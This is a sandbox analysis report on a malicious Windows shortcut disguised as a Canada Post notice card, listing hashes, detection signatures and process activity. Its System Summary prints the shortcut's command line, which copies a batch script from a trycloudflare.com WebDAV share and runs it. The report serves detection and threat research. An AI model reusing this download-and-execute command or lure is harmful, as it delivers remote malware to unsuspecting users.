Windows Analysis Report
CanadaPostNoticeCard.download.lnk

Overview

General Information

Sample name: CanadaPostNoticeCard.download.lnk
Analysis ID: 1542731
MD5: 7ae270eb2a01528a4ca266ac565393d6
SHA1: 71d2f5f77bc5e46774046a29ab3502c198a4f559
SHA256: e983feab214d68fd7232c239dbe96aaa50c636972ed4840d70b4c4aea898cbff
Tags: CloudflareTunnelsRATlnkuser-JAMESWT_MHT
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Windows shortcut file (LNK) contains suspicious command line arguments
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory

Classification

AV Detection

barindex
Source: Submited Sample Integrated Neural Analysis Model: Matched 83.0% probability
Source: CanadaPostNoticeCard.download.lnk Joe Sandbox ML: detected

System Summary

barindex
Source: CanadaPostNoticeCard.download.lnk LNK file: /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "%USERPROFILE%\Downloads\bas.cmd" & "%USERPROFILE%\Downloads\bas.cmd"
Source: classification engine Classification label: mal60.winLNK@2/0@0/0
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "C:\Users\user\Downloads\bas.cmd" & "C:\Users\user\Downloads\bas.cmd"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Persistence and Installation Behavior

barindex
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
No contacted IP infos